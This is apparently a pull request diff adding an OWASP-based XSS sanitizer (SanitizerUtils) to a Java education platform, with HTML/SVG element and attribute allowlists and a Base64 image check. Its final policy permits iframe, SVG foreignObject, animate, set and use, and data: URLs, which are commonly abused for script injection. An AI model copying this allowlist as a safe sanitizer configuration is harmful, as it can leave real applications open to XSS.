### PR TITLE
[EDIFICE] #Wb2-995 XSS Sanitizer

### DIFF
--- a/build.gradle
+++ b/build.gradle
@@ -212,6 +212,7 @@ project(':common') {
     }
     compile "io.vertx:vertx-micrometer-metrics:$vertxVersion"
     compile "io.micrometer:micrometer-registry-prometheus:$micrometerPrometheusVersion"
+    compile "com.googlecode.owasp-java-html-sanitizer:owasp-java-html-sanitizer:$owaspVersion"
     testCompile project(':test')
   }
 }

--- a/common/src/main/java/org/entcore/common/utils/HtmlUtils.java
+++ b/common/src/main/java/org/entcore/common/utils/HtmlUtils.java
@@ -2,13 +2,13 @@ package org.entcore.common.utils;
 
 import fr.wseduc.webutils.collections.JsonArray;
 import io.vertx.core.json.JsonObject;
-import org.owasp.html.HtmlPolicyBuilder;
-import org.owasp.html.PolicyFactory;
+import io.vertx.core.logging.Logger;
+import io.vertx.core.logging.LoggerFactory;
 
 import java.util.ArrayList;
 import java.util.HashMap;
-import java.util.TreeMap;
 import java.util.Set;
+import java.util.TreeMap;
 import java.util.regex.Matcher;
 import java.util.regex.Pattern;
 
@@ -16,33 +16,55 @@ import static org.entcore.common.utils.StringUtils.*;
 
 public class HtmlUtils {
 
-    private static HashMap<String,String> htmlEntities;
+    private static HashMap<String, String> htmlEntities;
+
     static {
-        htmlEntities = new HashMap<String,String>();
-        htmlEntities.put("&lt;","<")    ; htmlEntities.put("&gt;",">");
-        htmlEntities.put("&amp;","&")   ; htmlEntities.put("&quot;","\"");
-        htmlEntities.put("&agrave;","à"); htmlEntities.put("&Agrave;","À");
-        htmlEntities.put("&acirc;","â") ; htmlEntities.put("&auml;","ä");
-        htmlEntities.put("&Auml;","Ä")  ; htmlEntities.put("&Acirc;","Â");
-        htmlEntities.put("&aring;","å") ; htmlEntities.put("&Aring;","Å");
-        htmlEntities.put("&aelig;","æ") ; htmlEntities.put("&AElig;","Æ" );
-        htmlEntities.put("&ccedil;","ç"); htmlEntities.put("&Ccedil;","Ç");
-        htmlEntities.put("&eacute;","é"); htmlEntities.put("&Eacute;","É" );
-        htmlEntities.put("&egrave;","è"); htmlEntities.put("&Egrave;","È");
-        htmlEntities.put("&ecirc;","ê") ; htmlEntities.put("&Ecirc;","Ê");
-        htmlEntities.put("&euml;","ë")  ; htmlEntities.put("&Euml;","Ë");
-        htmlEntities.put("&iuml;","ï")  ; htmlEntities.put("&Iuml;","Ï");
-        htmlEntities.put("&ocirc;","ô") ; htmlEntities.put("&Ocirc;","Ô");
-        htmlEntities.put("&ouml;","ö")  ; htmlEntities.put("&Ouml;","Ö");
-        htmlEntities.put("&oslash;","ø") ; htmlEntities.put("&Oslash;","Ø");
-        htmlEntities.put("&szlig;","ß") ; htmlEntities.put("&ugrave;","ù");
-        htmlEntities.put("&Ugrave;","Ù"); htmlEntities.put("&ucirc;","û");
-        htmlEntities.put("&Ucirc;","Û") ; htmlEntities.put("&uuml;","ü");
-        htmlEntities.put("&Uuml;","Ü")  ; htmlEntities.put("&nbsp;"," ");
-        htmlEntities.put("&copy;","\u00a9");
-        htmlEntities.put("&reg;","\u00ae");
-        htmlEntities.put("&euro;","\u20a0");
+        htmlEntities = new HashMap<String, String>();
+        htmlEntities.put("&lt;", "<");
+        htmlEntities.put("&gt;", ">");
+        htmlEntities.put("&amp;", "&");
+        htmlEntities.put("&quot;", "\"");
+        htmlEntities.put("&agrave;", "à");
+        htmlEntities.put("&Agrave;", "À");
+        htmlEntities.put("&acirc;", "â");
+        htmlEntities.put("&auml;", "ä");
+        htmlEntities.put("&Auml;", "Ä");
+        htmlEntities.put("&Acirc;", "Â");
+        htmlEntities.put("&aring;", "å");
+        htmlEntities.put("&Aring;", "Å");
+        htmlEntities.put("&aelig;", "æ");
+        htmlEntities.put("&AElig;", "Æ");
+        htmlEntities.put("&ccedil;", "ç");
+        htmlEntities.put("&Ccedil;", "Ç");
+        htmlEntities.put("&eacute;", "é");
+        htmlEntities.put("&Eacute;", "É");
+        htmlEntities.put("&egrave;", "è");
+        htmlEntities.put("&Egrave;", "È");
+        htmlEntities.put("&ecirc;", "ê");
+        htmlEntities.put("&Ecirc;", "Ê");
+        htmlEntities.put("&euml;", "ë");
+        htmlEntities.put("&Euml;", "Ë");
+        htmlEntities.put("&iuml;", "ï");
+        htmlEntities.put("&Iuml;", "Ï");
+        htmlEntities.put("&ocirc;", "ô");
+        htmlEntities.put("&Ocirc;", "Ô");
+        htmlEntities.put("&ouml;", "ö");
+        htmlEntities.put("&Ouml;", "Ö");
+        htmlEntities.put("&oslash;", "ø");
+        htmlEntities.put("&Oslash;", "Ø");
+        htmlEntities.put("&szlig;", "ß");
+        htmlEntities.put("&ugrave;", "ù");
+        htmlEntities.put("&Ugrave;", "Ù");
+        htmlEntities.put("&ucirc;", "û");
+        htmlEntities.put("&Ucirc;", "Û");
+        htmlEntities.put("&uuml;", "ü");
+        htmlEntities.put("&Uuml;", "Ü");
+        htmlEntities.put("&nbsp;", " ");
+        htmlEntities.put("&copy;", "\u00a9");
+        htmlEntities.put("&reg;", "\u00ae");
+        htmlEntities.put("&euro;", "\u20a0");
     }
+
     private static Set<String> htmlEntitiesKeys = htmlEntities.keySet();
     private static final Pattern imageSrcPattern = Pattern.compile("<img(\\s+[^>]*)?\\ssrc=\"([^\"]+)\"");
     private static final Pattern audioSrcPattern = Pattern.compile("<audio(\\s+[^>]*)?\\ssrc=\"([^\"]+)\"");
@@ -56,93 +78,8 @@ public class HtmlUtils {
     private static final Pattern unsafeAttributePattern = Pattern.compile("(ng-[a-zA-Z0-9-]+\\s*=\\s*\"[^\"]*\")|"
             + "(on[a-zA-Z]+\\s*=\\s*\"[^\"]*\")|"
             + "(href\\s*=\\s*\"javascript:[^\"]*\")");
-    /**
-     * Custom html element allowed in xss sanitizer
-     */
-    private static final String[] ALLOWED_CUSTOM_ELEMENTS = new String[] {"mathjax"};
-    /**
-     * HTML element allowed in xss sanitizer
-     * https://developer.mozilla.org/en-US/docs/Web/HTML/Element
-     */
-    private static final String[] ALLOWED_ELEMENTS = new String[]{
-            // document metadata
-            //forbidden : "base", "head", "link", "meta", "style", "title", "body",
-            // content sectionning
-            "address", "article", "aside", "footer", "header",
-            "h1", "h2", "h3", "h4", "h5", "h6", "hgroup", "main", "nav", "section", "search",
-            // text content
-            "blockquote", "dd", "div", "dl", "dt", "figcaption", "figure", "hr", "li", "menu", "ol", "p", "pre", "ul",
-            // inline text
-            "a", "abbr", "b", "bdi", "bdo", "br", "cite", "code", "data", "dfn", "em", "i", "kbd", "mark", "q", "rp", "rt", "ruby", "s", "samp", "small", "span", "strong", "sub", "sup", "time", "u", "var", "wbr",
-            //image multimedia
-            "area", "audio", "img", "map", "track", "video",
-            // embed content
-            //forbidden :  "embed", "iframe", "object",
-            "picture",
-            //forbidden :  "portal", "source","svg",
-            // math and canvas
-            "math", "canvas",
-            // scription
-            // forbidden: "noscript", "script",
-            // demarcating
-            // forbidden: "del", "ins",
-            // table
-            "caption", "col", "colgroup", "table", "tbody", "td", "tfoot", "th", "thead", "tr", "button", "datalist", "fieldset",
-            // form
-            // forbiddent: "form", "input", "label", "legend", "meter", "optgroup", "option", "output", "progress", "select", "textarea",
-            // interactive elements
-            // forbidden: "details", "dialog", "summary",
-            // webcomponents
-            // forbidden: "slot","template",
-            // obsolete
-            // forbidden: "acronym", "big", "center", "content", "dir", "font", "frame", "frameset", "image", "marquee", "menuitem", "nobr", "noembed", "noframes", "param", "plaintext", "rb", "rtc", "shadow", "strike", "tt", "xmp"
-    };
-    /**
-     * HTML attributes allowed in xss sanitizer
-     * https://developer.mozilla.org/en-US/docs/Web/HTML/Attributes
-     */
-    private static final String[] ALLOW_ATTRIBUTES = new String[]{
-            //forbidden "accept","accept-charset","accesskey","action",
-            "align",
-            // forbidden: "allow",
-            "alt",
-            // forbidden: "async","autocapitalize","autocomplete",
-            "autoplay", "background", "bgcolor", "border",
-            // forbidden "buffered","capture","charset",
-            "checked", "cite", "class", "color", "cols", "colspan",
-            // forbidden: "content","contenteditable","contextmenu",
-            "controls", "coords",
-            // forbidden: "crossorigin","csp","data","data-*","datetime","decoding","default","defer",
-            "dir",
-            // forbidden: "dirname",
-            "disabled",
-            //forbidden: "download","draggable","enctype","enterkeyhint",
-            "for",
-            //forbidden: "form","formaction","formenctype","formmethod","formnovalidate","formtarget","headers",
-            "height",
-            // forbidden: "hidden","high",
-            "href", "hreflang",
-            // forbidden: "http-equiv"
-            "id",
-            // forbidden: "integrity","intrinsicsize","inputmode","ismap","itemprop","kind",
-            "label", "lang",
-            // forbidden: "language","loading","list","loop","low","manifest","max","maxlength","minlength","media","method","min","multiple","muted","name","novalidate","open","optimum","pattern","ping","placeholder","playsinline","poster","preload",
-            "readonly",
-            // forbidden "referrerpolicy","rel","required","reversed",
-            "role", "rows", "rowspan",
-            // forbidden "sandbox","scope","scoped",
-            "selected",
-            // forbidden "shape","size","sizes","slot","span",
-            "spellcheck", "src",
-            // forbidden "srcdoc","srclang","srcset","start","step",
-            "style", "summary", "tabindex", "target", "title", "translate", "type",
-            // forbidden: "usemap",
-            "value", "width", "wrap"
-    };
-    static final PolicyFactory policy = new HtmlPolicyBuilder().allowStandardUrlProtocols().allowElements(ALLOWED_CUSTOM_ELEMENTS).allowElements(ALLOWED_ELEMENTS).allowAttributes(ALLOW_ATTRIBUTES).globally().toFactory();
 
-
-    public static JsonArray getAllImagesSrc(String htmlContent){
+    public static JsonArray getAllImagesSrc(String htmlContent) {
         JsonArray images = new JsonArray();
         Matcher matcher = imageSrcPattern.matcher(htmlContent);
         while (matcher.find()) {
@@ -151,7 +88,7 @@ public class HtmlUtils {
         return images;
     }
 
-    public static JsonArray getAllImagesSrc(String htmlContent, int limit){
+    public static JsonArray getAllImagesSrc(String htmlContent, int limit) {
         JsonArray images = new JsonArray();
         Matcher matcher = imageSrcPattern.matcher(htmlContent);
         int nbfind = 0;
@@ -163,55 +100,55 @@ public class HtmlUtils {
         return images;
     }
 
-    public static String extractPlainText(String htmlContent){
+    public static String extractPlainText(String htmlContent) {
         StringBuilder sb = new StringBuilder();
         Matcher matcher = plainTextPattern.matcher(formatSpaces(htmlContent));
-        while (matcher.find()){
+        while (matcher.find()) {
             sb.append(matcher.group(1));
         }
-        return sb.toString().replaceAll(attachmentsPattern.pattern(),"");
+        return sb.toString().replaceAll(attachmentsPattern.pattern(), "");
     }
 
-    public static String extractFormatText(String htmlContent){
-        String textWithoutattachments = htmlContent.replaceAll(attachmentsPattern.pattern(),"");
-        String onlyText = textWithoutattachments.replaceAll("<(/div|/p|/li|br|)>","\n").replaceAll("<.*?>","");
+    public static String extractFormatText(String htmlContent) {
+        String textWithoutattachments = htmlContent.replaceAll(attachmentsPattern.pattern(), "");
+        String onlyText = textWithoutattachments.replaceAll("<(/div|/p|/li|br|)>", "\n").replaceAll("<.*?>", "");
         String unescaped = unescapeHtmlEntities(onlyText);
         return formatSpaces(unescaped);
     }
 
-    public static String extractFormatText(String htmlContent, int limitLines){
+    public static String extractFormatText(String htmlContent, int limitLines) {
         String text = extractFormatText(htmlContent);
         int pos = ordinalIndexOf(text, "\n", limitLines);
-        if(pos != -1)
+        if (pos != -1)
             return text.substring(0, pos);
         return text;
     }
 
-    public static String extractFormatText(String htmlContent, int limitLines, int limitChar){
+    public static String extractFormatText(String htmlContent, int limitLines, int limitChar) {
         String text = extractFormatText(htmlContent, limitLines);
-        if(limitChar > text.length())
+        if (limitChar > text.length())
             return text;
         return text.substring(0, limitChar);
     }
 
-    public static String unescapeHtmlEntities(String htmlContent){
-        if(isEmpty(htmlContent))
+    public static String unescapeHtmlEntities(String htmlContent) {
+        if (isEmpty(htmlContent))
             return htmlContent;
-        for(String key : htmlEntitiesKeys){
+        for (String key : htmlEntitiesKeys) {
             htmlContent = htmlContent.replaceAll(key, htmlEntities.get(key));
         }
         return htmlContent;
     }
 
-    public static String formatSpaces(String content){
-        return trimToBlank(content).replaceAll("\\u200b","").replaceAll("[ ,\\t]{2,}"," ").replaceAll("[\\s]{2,}","\n");
+    public static String formatSpaces(String content) {
+        return trimToBlank(content).replaceAll("\\u200b", "").replaceAll("[ ,\\t]{2,}", " ").replaceAll("[\\s]{2,}", "\n");
     }
 
     public static JsonArray extractMedias(String htmlContent) {
         return extractMedias(htmlContent, 0);
     }
 
-    public static JsonArray extractMedias(String htmlContent, int limitEach){
+    public static JsonArray extractMedias(String htmlContent, int limitEach) {
         TreeMap<Integer, JsonObject> medias = new TreeMap();
         Matcher matcher, subMatcher;
         // 1. Images
@@ -283,8 +220,4 @@ public class HtmlUtils {
         return cleanHtml;
     }
 
-    public static String xssSanitize(final String input) {
-        final String cleanHtml = policy.sanitize(input);
-        return cleanHtml;
-    }
 }

--- a/common/src/main/java/org/entcore/common/utils/HtmlUtils.java
+++ b/common/src/main/java/org/entcore/common/utils/HtmlUtils.java
@@ -79,9 +79,9 @@ public class HtmlUtils {
             // embed content
             //forbidden :  "embed", "iframe", "object",
             "picture",
-            //forbidden :  "portal", "source",
-            // svg and math
-            "svg", "math", "canvas",
+            //forbidden :  "portal", "source","svg",
+            // math and canvas
+            "math", "canvas",
             // scription
             // forbidden: "noscript", "script",
             // demarcating

--- a/common/src/main/java/org/entcore/common/utils/HtmlUtils.java
+++ b/common/src/main/java/org/entcore/common/utils/HtmlUtils.java
@@ -2,6 +2,8 @@ package org.entcore.common.utils;
 
 import fr.wseduc.webutils.collections.JsonArray;
 import io.vertx.core.json.JsonObject;
+import org.owasp.html.HtmlPolicyBuilder;
+import org.owasp.html.PolicyFactory;
 
 import java.util.ArrayList;
 import java.util.HashMap;
@@ -54,6 +56,91 @@ public class HtmlUtils {
     private static final Pattern unsafeAttributePattern = Pattern.compile("(ng-[a-zA-Z0-9-]+\\s*=\\s*\"[^\"]*\")|"
             + "(on[a-zA-Z]+\\s*=\\s*\"[^\"]*\")|"
             + "(href\\s*=\\s*\"javascript:[^\"]*\")");
+    /**
+     * Custom html element allowed in xss sanitizer
+     */
+    private static final String[] ALLOWED_CUSTOM_ELEMENTS = new String[] {"mathjax"};
+    /**
+     * HTML element allowed in xss sanitizer
+     * https://developer.mozilla.org/en-US/docs/Web/HTML/Element
+     */
+    private static final String[] ALLOWED_ELEMENTS = new String[]{
+            // document metadata
+            //forbidden : "base", "head", "link", "meta", "style", "title", "body",
+            // content sectionning
+            "address", "article", "aside", "footer", "header",
+            "h1", "h2", "h3", "h4", "h5", "h6", "hgroup", "main", "nav", "section", "search",
+            // text content
+            "blockquote", "dd", "div", "dl", "dt", "figcaption", "figure", "hr", "li", "menu", "ol", "p", "pre", "ul",
+            // inline text
+            "a", "abbr", "b", "bdi", "bdo", "br", "cite", "code", "data", "dfn", "em", "i", "kbd", "mark", "q", "rp", "rt", "ruby", "s", "samp", "small", "span", "strong", "sub", "sup", "time", "u", "var", "wbr",
+            //image multimedia
+            "area", "audio", "img", "map", "track", "video",
+            // embed content
+            //forbidden :  "embed", "iframe", "object",
+            "picture",
+            //forbidden :  "portal", "source",
+            // svg and math
+            "svg", "math", "canvas",
+            // scription
+            // forbidden: "noscript", "script",
+            // demarcating
+            // forbidden: "del", "ins",
+            // table
+            "caption", "col", "colgroup", "table", "tbody", "td", "tfoot", "th", "thead", "tr", "button", "datalist", "fieldset",
+            // form
+            // forbiddent: "form", "input", "label", "legend", "meter", "optgroup", "option", "output", "progress", "select", "textarea",
+            // interactive elements
+            // forbidden: "details", "dialog", "summary",
+            // webcomponents
+            // forbidden: "slot","template",
+            // obsolete
+            // forbidden: "acronym", "big", "center", "content", "dir", "font", "frame", "frameset", "image", "marquee", "menuitem", "nobr", "noembed", "noframes", "param", "plaintext", "rb", "rtc", "shadow", "strike", "tt", "xmp"
+    };
+    /**
+     * HTML attributes allowed in xss sanitizer
+     * https://developer.mozilla.org/en-US/docs/Web/HTML/Attributes
+     */
+    private static final String[] ALLOW_ATTRIBUTES = new String[]{
+            //forbidden "accept","accept-charset","accesskey","action",
+            "align",
+            // forbidden: "allow",
+            "alt",
+            // forbidden: "async","autocapitalize","autocomplete",
+            "autoplay", "background", "bgcolor", "border",
+            // forbidden "buffered","capture","charset",
+            "checked", "cite", "class", "color", "cols", "colspan",
+            // forbidden: "content","contenteditable","contextmenu",
+            "controls", "coords",
+            // forbidden: "crossorigin","csp","data","data-*","datetime","decoding","default","defer",
+            "dir",
+            // forbidden: "dirname",
+            "disabled",
+            //forbidden: "download","draggable","enctype","enterkeyhint",
+            "for",
+            //forbidden: "form","formaction","formenctype","formmethod","formnovalidate","formtarget","headers",
+            "height",
+            // forbidden: "hidden","high",
+            "href", "hreflang",
+            // forbidden: "http-equiv"
+            "id",
+            // forbidden: "integrity","intrinsicsize","inputmode","ismap","itemprop","kind",
+            "label", "lang",
+            // forbidden: "language","loading","list","loop","low","manifest","max","maxlength","minlength","media","method","min","multiple","muted","name","novalidate","open","optimum","pattern","ping","placeholder","playsinline","poster","preload",
+            "readonly",
+            // forbidden "referrerpolicy","rel","required","reversed",
+            "role", "rows", "rowspan",
+            // forbidden "sandbox","scope","scoped",
+            "selected",
+            // forbidden "shape","size","sizes","slot","span",
+            "spellcheck", "src",
+            // forbidden "srcdoc","srclang","srcset","start","step",
+            "style", "summary", "tabindex", "target", "title", "translate", "type",
+            // forbidden: "usemap",
+            "value", "width", "wrap"
+    };
+    static final PolicyFactory policy = new HtmlPolicyBuilder().allowStandardUrlProtocols().allowElements(ALLOWED_CUSTOM_ELEMENTS).allowElements(ALLOWED_ELEMENTS).allowAttributes(ALLOW_ATTRIBUTES).globally().toFactory();
+
 
     public static JsonArray getAllImagesSrc(String htmlContent){
         JsonArray images = new JsonArray();
@@ -196,4 +283,8 @@ public class HtmlUtils {
         return cleanHtml;
     }
 
+    public static String xssSanitize(final String input) {
+        final String cleanHtml = policy.sanitize(input);
+        return cleanHtml;
+    }
 }

--- a/common/src/main/java/org/entcore/common/utils/SanitizerUtils.java
+++ b/common/src/main/java/org/entcore/common/utils/SanitizerUtils.java
@@ -1,0 +1,228 @@
+package org.entcore.common.utils;
+
+import io.vertx.core.logging.Logger;
+import io.vertx.core.logging.LoggerFactory;
+import org.owasp.html.ElementPolicy;
+import org.owasp.html.HtmlChangeListener;
+import org.owasp.html.HtmlPolicyBuilder;
+import org.owasp.html.PolicyFactory;
+
+import javax.annotation.Nullable;
+import java.util.*;
+import java.util.concurrent.atomic.AtomicInteger;
+
+public class SanitizerUtils {
+    private static Logger log = LoggerFactory.getLogger(SanitizerUtils.class);
+    /**
+     * Custom html element allowed in xss sanitizer
+     */
+    private static final String[] ALLOWED_CUSTOM_ELEMENTS = new String[]{"mathjax"};
+    /**
+     * HTML element allowed in xss sanitizer
+     * https://developer.mozilla.org/en-US/docs/Web/HTML/Element
+     */
+    private static final String[] ALLOWED_ELEMENTS = new String[]{
+            // document metadata
+            //forbidden : "base", "head", "link", "meta", "style", "title", "body",
+            // content sectionning
+            "address", "article", "aside", "footer", "header",
+            "h1", "h2", "h3", "h4", "h5", "h6", "hgroup", "main", "nav", "section", "search",
+            // text content
+            "blockquote", "dd", "div", "dl", "dt", "figcaption", "figure", "hr", "li", "menu", "ol", "p", "pre", "ul",
+            // inline text
+            "a", "abbr", "b", "bdi", "bdo", "br", "cite", "code", "data", "dfn", "em", "i", "kbd", "mark", "q", "rp", "rt", "ruby", "s", "samp", "small", "span", "strong", "sub", "sup", "time", "u", "var", "wbr",
+            //image multimedia
+            "area", "audio", "img", "map", "track", "video",
+            // embed content
+            //forbidden :  "embed", "object",
+            "iframe", "picture",
+            //forbidden :  "portal", "source",
+            "svg",
+            // math and canvas
+            "math", "canvas",
+            // scription
+            // forbidden: "noscript", "script",
+            // demarcating
+            // forbidden: "del", "ins",
+            // table
+            "caption", "col", "colgroup", "table", "tbody", "td", "tfoot", "th", "thead", "tr", "button", "datalist", "fieldset",
+            // form
+            // forbiddent: "form", "input", "label", "legend", "meter", "optgroup", "option", "output", "progress", "select", "textarea",
+            // interactive elements
+            // forbidden: "details", "dialog", "summary",
+            // webcomponents
+            // forbidden: "slot","template",
+            // obsolete
+            // forbidden: "acronym", "big", "center", "content", "dir", "font", "frame", "frameset", "image", "marquee", "menuitem", "nobr", "noembed", "noframes", "param", "plaintext", "rb", "rtc", "shadow", "strike", "tt", "xmp"
+    };
+    /**
+     * HTML attributes allowed in xss sanitizer
+     * https://developer.mozilla.org/en-US/docs/Web/HTML/Attributes
+     */
+    private static final String[] ALLOW_ATTRIBUTES = new String[]{
+            //forbidden "accept","accept-charset","accesskey","action",
+            "align",
+            // forbidden: "allow",
+            "alt",
+            // forbidden: "async","autocapitalize","autocomplete",
+            "autoplay", "background", "bgcolor", "border",
+            // forbidden "buffered","capture","charset",
+            "checked", "cite", "class", "color", "cols", "colspan",
+            // forbidden: "content","contenteditable","contextmenu",
+            "controls", "coords",
+            // forbidden: "crossorigin","csp","data","data-*","datetime","decoding","default","defer",
+            "dir",
+            // forbidden: "dirname",
+            "disabled",
+            //forbidden: "download","draggable","enctype","enterkeyhint",
+            "for",
+            //forbidden: "form","formaction","formenctype","formmethod","formnovalidate","formtarget","headers",
+            "height",
+            // forbidden: "hidden","high",
+            "href", "hreflang",
+            // forbidden: "http-equiv"
+            "id",
+            // forbidden: "integrity","intrinsicsize","inputmode","ismap","itemprop","kind",
+            "label", "lang",
+            // forbidden: "language",
+            "loading",
+            // "list","loop","low","manifest","max","maxlength","minlength","media","method","min","multiple","muted",
+            "name",
+            //"novalidate","open","optimum","pattern","ping","placeholder","playsinline","poster","preload",
+            "readonly",
+            // forbidden "referrerpolicy","rel","required","reversed",
+            "role", "rows", "rowspan",
+            // forbidden "sandbox","scope","scoped",
+            "selected",
+            // forbidden "shape","size","sizes","slot","span",
+            "spellcheck", "src",
+            // forbidden "srcdoc","srclang","srcset","start","step",
+            "style", "summary", "tabindex", "target", "title", "translate", "type",
+            // forbidden: "usemap",
+            "value", "width", "wrap"
+    };
+    /**
+     * HTML attributes allowed in xss sanitizer
+     * https://developer.mozilla.org/en-US/docs/Web/SVG/Attribute
+     */
+    private static final String[] ALLOW_SVG_ATTRIBUTES = new String[]{
+            "accent-height", "accumulate", "additive", "alignment-baseline", "alphabetic", "amplitude", "arabic-form", "ascent",
+            "attributeName", "attributeType", "azimuth", "baseFrequency", "baseline-shift", "baseProfile", "bbox", "begin", "bias",
+            "by", "calcMode", "cap-height", "class", "clip", "clipPathUnits", "clip-path", "clip-rule", "color", "color-interpolation",
+            "color-interpolation-filters", "color-profile", "color-rendering", "contentScriptType", "contentStyleType", "crossorigin",
+            "cursor", "cx", "cy", "d", "decelerate", "descent", "diffuseConstant", "direction", "display", "divisor", "dominant-baseline",
+            "dur", "dx", "dy", "edgeMode", "elevation", "enable-background", "end", "exponent", "fill", "fill-opacity", "fill-rule", "filter",
+            "filterRes", "filterUnits", "flood-color", "flood-opacity", "font-family", "font-size", "font-size-adjust", "font-stretch",
+            "font-style", "font-variant", "font-weight", "format", "from", "fr", "fx", "fy", "g1", "g2", "glyph-name", "glyph-orientation-horizontal",
+            "glyph-orientation-vertical", "glyphRef", "gradientTransform", "gradientUnits", "hanging", "height", "href", "hreflang",
+            "horiz-adv-x", "horiz-origin-x", "id", "ideographic", "image-rendering", "in", "in2", "intercept", "k", "k1", "k2", "k3", "k4",
+            "kernelMatrix", "kernelUnitLength", "kerning", "keyPoints", "keySplines", "keyTimes", "lang", "lengthAdjust", "letter-spacing",
+            "lighting-color", "limitingConeAngle", "local", "marker-end", "marker-mid", "marker-start", "markerHeight", "markerUnits", "markerWidth",
+            "mask", "maskContentUnits", "maskUnits", "mathematical", "max", "media", "method", "min", "mode", "name", "numOctaves",
+            "offset", "opacity", "operator", "order", "orient", "orientation", "origin", "overflow", "overline-position", "overline-thickness",
+            "panose-1", "paint-order", "path", "pathLength", "patternContentUnits", "patternTransform", "patternUnits",/*forbidden "ping",*/
+            "pointer-events", "points", "pointsAtX", "pointsAtY", "pointsAtZ", "preserveAlpha", "preserveAspectRatio", "primitiveUnits", "r", "radius",
+            // forbidden "referrerPolicy",
+            "refX", "refY", "rel", "rendering-intent", "repeatCount", "repeatDur",
+            // forbidden "requiredExtensions","requiredFeatures",
+            "restart", "result", "rotate", "rx", "ry", "scale", "seed", "shape-rendering", "slope", "spacing", "specularConstant",
+            "specularExponent", "speed", "spreadMethod", "startOffset", "stdDeviation", "stemh", "stemv", "stitchTiles", "stop-color",
+            "stop-opacity", "strikethrough-position", "strikethrough-thickness", "string", "stroke", "stroke-dasharray", "stroke-dashoffset",
+            "stroke-linecap", "stroke-linejoin", "stroke-miterlimit", "stroke-opacity", "stroke-width", "style", "surfaceScale", "systemLanguage",
+            "tabindex", "tableValues", "target", "targetX", "targetY", "text-anchor", "text-decoration", "text-rendering", "textLength", "to", "transform",
+            "transform-origin", "type", "u1", "u2", "underline-position", "underline-thickness", "unicode", "unicode-bidi", "unicode-range", "units-per-em",
+            "v-alphabetic", "v-hanging", "v-ideographic", "v-mathematical", "values", "vector-effect", "version", "vert-adv-y", "vert-origin-x", "vert-origin-y",
+            "viewBox", "viewTarget", "visibility", "width", "widths", "word-spacing", "writing-mode", "x", "x-height", "x1", "x2", "xChannelSelector",
+            // forbidden deprecated "xlink:actuate","xlink:arcrole","xlink:href","xlink:role","xlink:show","xlink:title","xlink:type","xml:base","xml:lang","xml:space",
+            "xmlns", "y", "y1", "y2", "yChannelSelector", "z", "zoomAndPan"
+            // forbidden: on* attributes
+    };
+    /**
+     * HTML attributes allowed in xss sanitizer
+     * https://developer.mozilla.org/en-US/docs/Web/SVG/Element
+     */
+    private static final String[] ALLOW_SVG_ELEMENTS = new String[]{
+            "a", "animate", "animateMotion", "animateTransform", "circle", "clipPath",
+            "defs", "desc", "ellipse", "feBlend", "feColorMatrix", "feComponentTransfer", "feComposite", "feConvolveMatrix",
+            "feDiffuseLighting", "feDisplacementMap", "feDistantLight", "feDropShadow", "feFlood", "feFuncA", "feFuncB", "feFuncG",
+            "feFuncR", "feGaussianBlur", "feImage", "feMerge", "feMergeNode", "feMorphology", "feOffset", "fePointLight", "feSpecularLighting",
+            "feSpotLight", "feTile", "feTurbulence", "filter", "foreignObject", "g", "hatch", "hatchpath", "image", "line",
+            "linearGradient", "marker", "mask", "metadata", "mpath", "path", "pattern", "polygon", "polyline", "radialGradient",
+            "rect",
+            // forbidden "script",
+            "set", "stop", "style", "svg", "switch", "symbol", "text", "textPath", "title", "tspan", "use", "view"
+            // forbidden deprecated: "cursor","font","font-face","font-face-format","font-face-name","font-face-src","font-face-uri","glyph","glyphRef","hkern","missing-glyph","tref","vkern"
+    };
+    static final PolicyFactory policy = new HtmlPolicyBuilder().allowStandardUrlProtocols()
+            .allowElements(ALLOWED_CUSTOM_ELEMENTS)
+            .allowElements(ALLOWED_ELEMENTS)
+            .allowAttributes(ALLOW_ATTRIBUTES).globally()
+            .allowElements(ALLOW_SVG_ELEMENTS)
+            .allowAttributes(ALLOW_SVG_ATTRIBUTES).onElements(ALLOW_SVG_ELEMENTS)
+            // allow data image
+            .allowUrlProtocols("data")
+            .allowElements(new Base64SanitizePolicy(), "img", "image")
+            .toFactory();
+
+    /**
+     *
+     * @param input raw html string
+     * @return html string sanitized from any xss injection
+     */
+    public static String sanitizeHtml(final String input) {
+        final String cleanHtml = policy.sanitize(input);
+        return cleanHtml;
+    }
+
+    /**
+     * This ElementPolicy is applied to img which contains base64:data as "src" value
+     * It checks whether the encoded base64 contains any encoded value and remove it if so
+     */
+    private static class Base64SanitizePolicy implements ElementPolicy {
+
+        @Nullable
+        @Override
+        public String apply(String elementName, List<String> attrs) {
+            try{
+                // check whether src value exists
+                final int index = attrs.indexOf("src");
+                final int nextIndex = index + 1;
+                if(index != -1 && 0 <= nextIndex &&  nextIndex < attrs.size()){
+                    final String value = attrs.get(nextIndex);
+                    // check whether image contains any base64 as src value
+                    if(value != null && value.contains("base64,")){
+                        // parse base64 and check whether it contains xss injections
+                        final String base64Image = value.split(",")[1];
+                        final String decodedImage = new String(Base64.getDecoder().decode(base64Image));
+                        final Base64HtmlChangeListener listener = new Base64HtmlChangeListener();
+                        // trigger sanitizer
+                        policy.sanitize(decodedImage, listener, null);
+                        // if sanitizer has detected forbidden element or attributes => remove src value
+                        if(listener.countIssues > 0){
+                            // remove data attribute
+                            attrs.set(nextIndex, "");
+                        }
+                    }
+                }
+                // keep img element in dom
+                return elementName;
+            }catch(Exception e){
+                // if base64 could not be parsed => remove img element from dom
+                log.error("Invalid img base64 decode: ", e);
+                return null;
+            }
+        }
+    }
+
+    private static class Base64HtmlChangeListener implements  HtmlChangeListener<Void>{
+        int countIssues = 0;
+        @Override
+        public void discardedTag(@Nullable Void context, String elementName) {
+            countIssues++;
+        }
+        @Override
+        public void discardedAttributes(@Nullable Void context, String tagName, String... attributeNames) {
+            countIssues++;
+        }
+    }
+}

--- a/common/src/main/java/org/entcore/common/utils/SanitizerUtils.java
+++ b/common/src/main/java/org/entcore/common/utils/SanitizerUtils.java
@@ -161,7 +161,7 @@ public class SanitizerUtils {
             .allowAttributes(ALLOW_SVG_ATTRIBUTES).onElements(ALLOW_SVG_ELEMENTS)
             // allow data image
             .allowUrlProtocols("data")
-            .allowElements(new Base64SanitizePolicy(), "img", "image")
+            .allowElements(new Base64SanitizePolicy(), "img", "image", "iframe")
             .toFactory();
 
     /**

--- a/common/src/test/java/org/entcore/common/utils/HtmlUtilsTest.java
+++ b/common/src/test/java/org/entcore/common/utils/HtmlUtilsTest.java
@@ -1,0 +1,57 @@
+package org.entcore.common.utils;
+
+import io.vertx.core.logging.Logger;
+import io.vertx.core.logging.LoggerFactory;
+import io.vertx.ext.unit.TestContext;
+import io.vertx.ext.unit.junit.VertxUnitRunner;
+import org.junit.BeforeClass;
